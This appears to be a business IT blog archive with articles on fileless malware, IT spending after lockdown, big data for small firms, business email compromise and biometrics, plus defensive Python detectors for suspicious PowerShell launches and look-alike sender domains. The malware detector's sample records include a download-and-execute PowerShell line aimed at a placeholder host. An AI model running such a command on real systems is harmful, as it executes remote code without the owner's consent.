Fileless Malware Poses New Threat to Computer Users

With increased cyber threats, there is great awareness of malware that comes attached in files. Individuals and businesses invest in security solutions to protect against malware. In fact, there are often company policies regarding opening attachments on emails; yet there is an increase in a type of threat (though not new) known as fileless malware.

What is Fileless Malware?

A fileless malware attack is a type of threat that doesn’t involve executable files. Instead, these attacks include scripts that run on browsers, command prompts, Windows PowerShell, Windows Management Instrumentation, VBScripts, or Linux (Python, PERL).

In other words, fileless malware is a form of cyberattack carried out through software that already exists on your device, in your authorized protocols and in applications that you have allowed on your device.

As such, fileless malware is becoming a favorite of cybercriminals because they don’t have to look for ways to install malicious files in your device – they only need to take advantage of built-in tools.

Reported examples of fileless malware include PowerGhost, which has been used in crypto-mining and DDoS attacks.

How It Works

First, note that these attacks are termed fileless because they are not file-based; instead, they hide in computer memory.

The malware launches an attack in various ways. For instance, malicious code is injected into an application that is already installed, or a user clicks on a legitimate-looking link that loads a remote script.

Another scenario involves a legitimate-looking website that a user visits: the attackers exploit vulnerabilities in the Flash plugin, and malicious code runs in the browser memory of the user’s computer.

While file-based malware uses executable files, the fileless type hides in areas where it can’t easily be detected, such as the memory. It is then written directly to the RAM (and not the disk), where it carries out a series of events.

Once in your system, the malware piggybacks on legitimate scripts and executes malicious activities while the legitimate program runs. At this point, it performs malicious activities such as payload delivery, escalating admin privileges, and reconnaissance, among others.

Since it works in-memory (RAM), its operations end when you reboot your system. This makes it more challenging to trace attacks. Fileless malware may also work in concert with other attack vectors, such as ransomware.

Detection and prevention

Various security vendors claim to have products that can detect fileless threats, as well as protect endpoint systems.

Successful security solutions need technologies that enable them to inspect different kinds of operating system storage, as well as analyze in real time the execution patterns of processes in a system.

But even so, one thing is certain: traditional anti-malware software will not detect fileless malware because it is not file-based and does not leave footprints. Here are some tips that will help mitigate fileless attacks:

  • Regularly update the software on your devices (especially Microsoft applications) to protect against attacks propagated through PowerShell.
  • Apply an integrated approach that addresses the entire threat lifecycle. This is possible when you use a multilayered defense mechanism.
  • Use security solutions that can detect malicious attacks against command prompt (CMD), PowerShell, and whitelisted application scripts.
  • Use anti-malware tools that include machine learning, as this will limit scripts from creating new polymorphic malware within your environment.
  • Practice behavior monitoring to help look out for unusual patterns.
  • Use memory scanning to help detect patterns of known threats.
  • Be on the lookout for high CPU usage by legitimate processes and suspicious error messages that appear for no clear reason.
  • Disable PowerShell and Windows Management Instrumentation (WMI) if you are not utilizing them.
  • Avoid using macros that have no digital signatures or turn off macros if not being used.
  • Use endpoint detection and response tools.
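
As an added illustration of the behavior-monitoring tips above (this code is not from the original article), the following sketch scores process-creation records for the script hosts the article names. The rule weights, the threshold and the sample records are assumptions constructed for the example.

```python
import re

# Script hosts named in the article, and applications that should rarely launch them.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# (finding, weight, pattern) applied to the command line. Weights are assumptions.
CMDLINE_RULES = [
    # -EncodedCommand (or an abbreviation) followed by a long base64-looking argument
    ("encoded_command", 3, re.compile(r"[-/]e[a-z]*\s+[A-Za-z0-9+/=]{20,}", re.I)),
    # -WindowStyle Hidden (or an abbreviated flag): no visible console
    ("hidden_window", 2, re.compile(r"[-/]w[a-z]*\s+hidden\b", re.I)),
]
# A remote fetch combined with an evaluate step: the script never touches disk.
FETCH = re.compile(r"downloadstring|downloaddata|invoke-webrequest|net\.webclient", re.I)
EVAL = re.compile(r"\biex\b|invoke-expression", re.I)


def basename(path):
    """Lower-cased file name of a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return (score, findings) for one process-creation record."""
    image, parent = basename(event["image"]), basename(event["parent"])
    if image not in SCRIPT_HOSTS:
        return 0, []
    findings = []
    if parent in OFFICE_APPS:
        findings.append(("office_parent", 3))   # document macro launching a shell
    if parent == "wmiprvse.exe":
        findings.append(("wmi_parent", 2))      # process created through WMI
    cmdline = event["cmdline"]
    for name, weight, pattern in CMDLINE_RULES:
        if pattern.search(cmdline):
            findings.append((name, weight))
    if FETCH.search(cmdline) and EVAL.search(cmdline):
        findings.append(("remote_script_in_memory", 4))
    return sum(w for _, w in findings), [n for n, _ in findings]


def triage(events, threshold=4):
    """(score, findings, id) for events at or above the threshold, highest first."""
    hits = []
    for event in events:
        score, findings = score_event(event)
        if score >= threshold:
            hits.append((score, findings, event["id"]))
    return sorted(hits, key=lambda h: -h[0])


# Constructed sample records (not real telemetry); the base64 text is a placeholder.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"id": 2, "parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE", "image": PS,
     "cmdline": "powershell.exe -NoProfile -WindowStyle Hidden "
                "-EncodedCommand QQBCAEMARABFAEYARwBIAEkASgBLAEwA"},
    {"id": 3, "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "image": PS,
     "cmdline": "powershell.exe -Command \"IEX (New-Object Net.WebClient)"
                ".DownloadString('https://example.invalid/s.ps1')\""},
    {"id": 4, "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for score, findings, event_id in triage(SAMPLE_EVENTS):
        print(event_id, score, findings)
```

The records would normally come from process-creation auditing or an endpoint detection and response tool; the scoring only has value if command-line logging is enabled on the endpoints.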

Final Thoughts

The cyber threat landscape keeps evolving. Every day, there are more sophisticated threats as criminals keep advancing to take on countermeasures that have been implemented.

Invest in security solutions that mitigate varying classes of threats, especially machine learning technologies. This will help protect against the latest and emerging threats. Also, keep your Windows OS and other installed software up-to-date to reduce the chances of fileless malware attacks.

Despite taking the mentioned measures, it’s important to stay informed of the latest threats and take necessary precautions.

How IT Spending Will Change When Business Resumes

Most states are starting to relax stay-at-home restrictions. As such, businesses are developing plans for bringing employees back to work. Many businesses are already affected by the pandemic and their future looks grim. Specifically, we are going to look at the IT sector and examine what spending might look like in a post-lockdown economy.

Disruption

The COVID-19 pandemic has resulted in an unprecedented disruption in businesses. As a result, management has tried to reduce costs to survive or risk shutting down. IT departments have suffered the most with major budget cuts due to a reduction in revenue. As a result, non-urgent purchases have been eliminated; initiatives have been suspended; and employees have been terminated.

Of course, technology also has been playing a great role in supporting businesses during the pandemic, especially by enabling work at home and keeping in touch with clients. But there are expectations for major challenges when businesses get back to normal. For instance, the post-coronavirus business world expects travel restrictions, office distancing, business continuity, and pandemic regulations. As for onsite work in the office, challenges will include distributed collaboration, endpoint data protection, scalable administration, and secure access to corporate data.

It also appears that the impact will vary from industry to industry. Companies that depend on face-to-face contact are in danger of lost income and bankruptcy. At the same time, other businesses are thriving.

Consider digital marketing industries. With more businesses moving online, there will be a rise in the purchase of IT-related expenditures such as software. The entertainment sector has found solace in digital platforms, while there is an increase in the work-at-home trend.

The Future

Despite the uncertainties, some predictions can be made.

One thing that is certain is that the impact on IT spending will vary depending on the IT stack. While the infrastructure, branch networking, middleware, and enterprise apps might see a drop, areas such as communication/collaboration, cloud storage, security, and compliance will likely see an increase in spending as more people work remotely.

While the impact on the IT industry will definitely vary, we could see a lot of new innovations. Such innovations might include customer-facing and worker productivity apps. Some companies may increase spending on new innovations to help outperform their competition.

Another factor affecting IT spending is the size of a business. While big businesses may get back to normal after a few months, small businesses have to tread carefully. As such, IT spending for different-sized businesses will not be similar.

A decision to have employees continue working at home means that IT expenditures will take a different shape. While there will be less need for office equipment, there will be an increase in spending to enable offsite work.

There could also be more spending by businesses investing in continuity strategies such as more remote locations, new training in information and communications technology (ICT) and automation of processes.

This also will depend on business operations. Consider a business that had already migrated to the cloud before the COVID-19 pandemic. Such businesses did not suffer much disruption compared to those still using on-premise applications and proprietary data centers. Thus, IT spending for both types of businesses will vary in the future.

Lastly, businesses will want to invest in projects that are likely to provide a return on investment faster.

Conclusion

The disruption to businesses by the COVID-19 pandemic is like none previously encountered. One thing is certain: Things will not bounce back to the known normal. Rather, we should expect a new normal. And, as we have seen through the examination of certain IT expenditures, the success of each industry is dependent on various factors.

How Businesses Benefit from Big Data Analytics

Previously we looked at the key technology trends in accounting to watch out for in 2020. Among the trends are big data and data analytics, which can have a great impact on businesses.

Business data has existed for a long time, whether in filing cabinets, ledgers or storage devices. But today businesses both large and small have to deal with huge collections of data every day. This has seen the rise of data analytics trends that include deep learning, machine learning and dark data.

Unfortunately, small and medium businesses (SMB) have to struggle with making a decision on implementing data analytics. This is largely because many SMB owners assume that data analytics is strictly for large organizations – especially because of the expectation that it’s expensive and complicated.

Luckily, reduced tech costs have made it possible for small and medium businesses to afford technologies that were previously only cost-effective for big organizations.

Is the Cost and Effort Worth It? 

Before the advent of big data analytics, customer data was collected using surveys or customer feedback forms. Analyzing such data is tedious, and it’s possible to miss out on important trends.

Also, imagine running marketing campaigns and having no way to track how effective the campaign was. If you do this in your business, you have no way to know who saw the ad or even the response.

Enter big data and analytics and the whole marketing landscape changes. With big data, a business has clear insights about customer behavior. This is possible because we now can track visitors to a website, the time a visitor spends on a given page, action taken such as making an order, the location the purchase came from and so many other details that help a business refine its marketing strategy.

Is it costly? You’d be surprised to know that you don’t need to purchase expensive software. You’ll find, for instance, that you can take advantage of data collected by the QuickBooks accounting software. And depending on your business needs, the software can be connected with low-cost platforms that enable more detailed analytics.

You also can get free platforms such as Google Analytics to analyze website traffic and gain insight into consumer behavior. Whatever your company size, you can take advantage of big data insights to better understand your customers.

Here are some reasons why it’s worth it:

  • Analytics help to launch effective marketing campaigns that result in better ROI.
  • Analytics help to track the customers in their sales cycle.
  • It’s possible to track the outcome of business decisions, such as promotional strategies.
  • You get to know which suppliers or other business partners to work with.
  • Provides insights on customers who are likely to pay on time based on historical payment data.
  • Improves customer service. This is possible when customer conversations from different channels are analyzed.
  • It helps to improve the product or service offered by a business.  
  • Identifies trends and patterns. For instance, you can track frequently asked questions and then create a page to handle the common questions.
  • Helps create a strong bond with customers. By understanding customer interests, a business will then engage with their customers by creating personalized offers and campaigns.
  • On the tech side, big data is being used to detect and prevent fraud.  
  • Analytics identify problematic areas of a business, and this makes it easier to come up with a response quickly before the problem escalates.

Become Smarter

When used correctly, data analytics can help a business gain a competitive advantage over other businesses. At the same time, it will also boost your business conversions and revenue. But collecting just any piece of data can be overwhelming and even a waste of time. The secret is in collecting data that will help you reduce business costs and increase your revenue.

How to Stay Safe with Business Email Compromise on the Rise

According to a report by the Financial Crimes Enforcement Network (FinCEN) released in July, financial institutions have incurred more than $9 billion in losses due to Business Email Compromise (BEC) schemes since 2016. With such staggering losses, businesses and even individuals can’t afford to ignore BEC attacks.

What is BEC?

BEC fraud involves cyber thieves posing as company executives or a business contact with the intention to commit wire transfer fraud or obtain sensitive information. The main targets are businesses working with foreign suppliers or a business that carries out regular wire-transfer payments.

To carry out this attack, criminals might pretend to be the company CEO and request that a junior staff member perform a task for them, such as transferring funds. Attackers take advantage of the fact that most organizations don’t have a set procedure to verify instructions received from the top management.

How Attackers Collect Data from their Targets

Cyber criminals use various techniques to carry out BEC fraud, with the main aim of stealing funds from the victims. The techniques used include:

  • Imposter techniques – this can be carried out in various ways. Attackers use a look-alike domain, display-name deception and spoofed emails that appear to come from legitimate addresses.
  • Social engineering – when a target has not set appropriate privacy settings on social media accounts, an attacker can easily collect information that will make their requests sound legitimate.
  • Malware – this enables attackers to have access to sensitive information that makes the fake request sound legitimate.
  • Mining from the Dark Web – here attackers can obtain stolen credentials.

How to Avoid BEC Attacks

It is difficult for conventional security systems to detect BEC schemes. Consider a case in which a transaction is initiated willingly by a legitimate user in response to a request from a legitimate source. Such an email has no payloads such as malicious attachments that can be blocked.

Here are some methods to help reduce the possibility of these attacks:

  • Raising awareness of common attack scenarios or tactics used by the cyber criminals, such as a false domain name that looks almost like the original one, impersonation of a vendor, false sense of urgency or a request for secrecy.
  • Training employees on cyber security risks and implications.
  • Implementing email authentication protocols like Domain-Based Message Authentication, Reporting and Conformance (DMARC) and DomainKeys Identified Mail (DKIM).
  • Using layered defense, such as encryption, and virtual private networks.
  • Implementing multifactor authentication, which introduces a secondary authorization control. This will help stop attackers even when they have access to the target’s credentials.
  • Establishing communication protocols that will allow for a follow-up. For instance, if the person is requesting financial transactions, an employee should call to ascertain the request.
  • Scrutinizing all emails that request a fund transfer.
  • Monitoring incoming email, especially messages that use VIP names.
  • Optimizing accounting systems and controls.
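
The look-alike domain and display-name deception checks mentioned above can be automated on the From header. The following is an added example, not part of the original article; the organization domain, the VIP directory, the confusable-character table and the distance threshold are all assumptions constructed for illustration.

```python
from email.utils import parseaddr

ORG_DOMAIN = "example.com"                      # assumed organization domain
VIPS = {"jane doe": "jane.doe@example.com"}     # constructed VIP directory

# Characters and pairs commonly used to imitate letters (small illustrative table).
CONFUSABLES = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s"})


def skeleton(domain):
    """Normalize visually confusable characters so look-alikes compare equal."""
    return domain.lower().translate(CONFUSABLES).replace("rn", "m").replace("vv", "w")


def edit_distance(a, b):
    """Levenshtein distance, computed one row at a time."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_from(header, max_distance=2):
    """Return a list of findings for one From header value."""
    name, addr = parseaddr(header)
    name = " ".join(name.lower().split())
    addr = addr.lower()
    domain = addr.rpartition("@")[2]
    findings = []
    if domain != ORG_DOMAIN:
        # Same skeleton or a near miss: a domain registered to resemble ours.
        if (skeleton(domain) == skeleton(ORG_DOMAIN)
                or edit_distance(domain, ORG_DOMAIN) <= max_distance):
            findings.append("lookalike_domain")
        # An executive's name on a message from outside the organization.
        if name in VIPS:
            findings.append("vip_display_name_external")
    elif name in VIPS and addr != VIPS[name]:
        # Internal domain, but not the address on record for that person.
        findings.append("vip_display_name_mismatch")
    return findings


# Constructed sample headers.
SAMPLES = [
    "Jane Doe <jane.doe@example.com>",
    "Jane Doe <jane.doe@examp1e.com>",
    '"Jane Doe" <jdoe.office@mail.test>',
    "Accounts <billing@exarnple.com>",
]

if __name__ == "__main__":
    for header in SAMPLES:
        print(header, "->", check_from(header))
```

A finding is a reason to apply the call-back procedure described above before acting on the request; it does not replace DMARC and DKIM enforcement, which cover spoofing of the genuine domain.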

Final Thoughts

Apart from taking precautionary measures, businesses also should make sure that their insurance specifically covers BEC attacks, as courts might have different interpretations of policies. Consider the case of Apache Corporation, which lost $7 million due to a BEC attack. The judge ruled that since the money was sent to pay a legitimate invoice to the wrong bank, it was not covered by their insurance policy.

Note that a majority of these criminals are from countries that might not have strict laws on cybercrime, making it difficult to have them prosecuted.

So, whether you run a small, medium or large business, or even a personal account, it’s vital that you take precautionary measures against the increasing BEC schemes.

The Rise of Biometrics Security and Why You Should Take Precaution

Biometric technology has been on the rise as it promises to make the authentication process more secure and convenient. Unlike passwords and key cards, biometrics are something you will always have, can’t share and can’t forget. This makes the biometric approach convenient and at the same time it has lower password management costs.

Biometrics also are said to be difficult to steal or hack; difficult, but not impossible.

Any technology can have loopholes that can be exploited, and that’s why you need to understand it well and take precautions if you decide to use this approach.

The use of biometrics is not new, but its increased presence in the public domain such as banks makes it a topic of interest.

To help us understand the need to tread carefully, let’s first have a peek at the latest biometric security technologies.

New Trends in Biometric Security

Biometric authentication is becoming popular for digital payments, logging in to banking systems and even on smartphones. New trends in biometrics security include:

  • Voice recognition: the human voice is used to create voice prints to be used for user authentication in a voice ID system. 
  • Face recognition: 3D face recognition is another new development that uses sensors to identify the shape of a person’s face. This is done by using facial characteristics such as the nose, cheeks, chin and contours of the eye sockets. 
  • Mobile biometric technology: mobile devices also have joined the bandwagon, and manufacturers are now fitting them with biometric sensors. It is also possible to attach portable biometric-sensing equipment using a USB cable.
  • Biometrics on the cloud: cloud-based solutions have been developed to speed up the identification process. Since users don’t have to spend so much on necessary applications, hardware and infrastructure, this becomes cost effective.

How Secure is the Biometric Approach?

Biometric security is increasingly being used in preference to passwords, but how safe is this approach? Fingerprints may not be as secure as they are said to be. Consider this: some researchers were actually able to generate fake fingerprints that they called DeepMasterPrints. These fingerprints were generated using a neural network technique to create artificial fingerprints that can work as a “master key.” This goes to show how a system using fingerprints for security can be vulnerable to dictionary attacks using the created MasterPrints.

There are many people posting their pictures online on social media. Unfortunately, once you do that your images are no longer private. This means that a face can easily be captured from the internet.

Retina scans are considered extremely reliable and more accurate than the iris scan. However, the retina scan is the least common, as it’s considered to be intrusive.

Reservations

The use of biometrics is a great development toward security concerns, but it raises privacy issues. Keep in mind that biometric information can easily be harvested – from a distance and without your knowledge. The cloud also is another reason to be concerned. Although biometrics are effective in enforcing security, the data collected has to be stored somewhere. How secure are the databases that store this information? Of course, this increases the possibilities of a breach.

Some reports made public include a potential hack for the palm vein scanner and a claim by a research team at vpnMentor about a leak of millions of fingerprints from BioStar 2, an app built by Suprema. Whether this and other similar claims are true or not, it just goes to show how vulnerable biometrics data can be. It also won’t be long before marketplaces emerge on the Dark Web for actual biometrics.

Remember that unlike passwords, you can’t change your biometrics. If someone had access to a biometrics database, then they would have access to sensitive data.

Another reservation involves the right to privacy for your biometrics. It’s possible for your biometrics to be collected without your informed consent, for instance, in stores where face recognition is used to identify potential shoplifters or to survey shoppers’ behavior. Recently, the FaceApp Challenge created by a Russian company had its share of controversy. Although said to be purely for entertainment, it also means that no one has control over what the company collecting the data will do with it.

Businesses face the potential risk of getting sued by their own employees. This is because there are some locations that already have a biometric privacy act law. In the United States, the Illinois Biometric Information Privacy Act (BIPA) allows users to sue under this law to protect their privacy.

Stay Safe

Since cyber criminals are always working on hacking new security systems, it’s crucial that users of these systems remain cautious. One of the ways to stay safe when using biometrics is the use of multi-modal authentication, which requires input from more than one biometric device. This will help overcome some loopholes, such as the use of copied fingerprints or stolen voice and facial prints.

Luckily, with advances in artificial intelligence and machine learning, biometrics can be enhanced. Users can be scrutinized using their online behavior. Since people tend to be creatures of habit, a behavior-based system can develop a more complex user profile. The tracked behavior will help to tell a genuine user from a potential threat.

Since it’s difficult to know if your biometrics have been stolen, it’s best to take precautionary measures that could include:

  • Avoiding unnecessarily sharing personal information, such as the bank account numbers, date of birth or Social Security number
  • Paying close attention to your bills and financial statements
  • Watching out for unauthorized transactions by reviewing your credit card and bank statements.
  • Using other security features on your mobile device.
  • Avoiding using public WiFi. It is also important that you keep your sharing and firewall settings updated.

In Conclusion

Biometric authentication is not a silver bullet. Technically, biometrics are not secret and carry cyber risks similar to those of passwords, only they are exploited differently. Whenever a new technology becomes pervasive, there are individuals who will definitely try to figure it out, especially because these technologies are used to access financial services and private data.

In the digital world, we cannot assume complete security. The best you can do is work with known credible vendors and stick with providers who comply with both federal and state data privacy regulations. Lastly, use technologies that are tried and tested.